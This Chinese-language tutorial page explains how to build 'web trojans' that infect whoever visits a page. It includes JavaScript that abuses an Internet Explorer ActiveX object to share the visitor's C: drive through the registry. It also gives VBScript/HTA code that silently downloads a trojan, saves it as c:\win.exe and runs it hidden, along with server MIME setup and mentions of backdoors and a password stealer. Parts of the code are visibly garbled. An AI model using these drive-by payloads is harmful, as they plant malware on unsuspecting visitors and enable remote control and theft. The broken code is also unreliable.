网页自动运行EXE程序资源
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下: run_exe="" run_exe+="" run_exe+="" run_exe+="网页加载中,请稍后...."; document.open(); document.clear(); document.writeln(run_exe); document.close(); 再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文 件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。 2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下: script language=javascript> document.write("
"); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\"); } function init() { setTimeout("f()", 1000); } init(); 当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然共享了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://www.chinawww365.com连接目标地址里...这种网页木马的特点是比较安全,不易被对方发现,但是使用麻烦需要牵扯到很多的东西。 3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。 这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦 好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处 网页木马制作讲解 我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马. 首先我们需要编写几个简单的文件 一、名字为abc.abc的文件 Function HttpDoGet(url) set oreq = CreateObject("Microsoft.XMLHTTP") oreq.open "GET",url,false oreq.send If oreq.status=200 then HttpDoGet=oReq.respomseBody Savefile HttpDoGet,"c:\win.exe" End If Set oreq=nothing End Function sub SaveFile(str.fName) Set objStream = CreateObject("ADODB.Stream") objStream.Type =1 objStream.Open objStream.write str objStream.SaveToFile fName.2 objStream.Close() set objStream = nothing exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.exe",0) b=wshshell.run ("cmd.exe /c del c:\win.hta",0) window.close End Sub HttpDoGet "http://127.0.0.1/test.exe" 其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。 二、名字为test.htm的文件 木马运行测试!(这句话可以改成你想说的) 三、名字为win.test的文件 Function HttpDoGet(url) set oreq = CreateObject("Microsoft.XMLHTTP") oreq.open "GET",url,false oreq.send If oreq.status=200 then HttpDoGet,"c:\win.hta" Set oreq=nothing End if end function sub SaveFile(str,fName) Dim fso, tf S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject") Set tf = fso.CreateTextfile(fName,True) tf.Write str tf.Close exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.hat",0) window.close End Sub HttpDoGet("http://127.0.0.1/abc.abc") 四、名字为test.exe的木马程序。 晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。 服务器的文件列表 test.htm:对外发布的网页 win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。 abc.abc下载二进制的木马文件test.exe,并执行。 test.exe:木马程序。 上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了! 最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
用户评论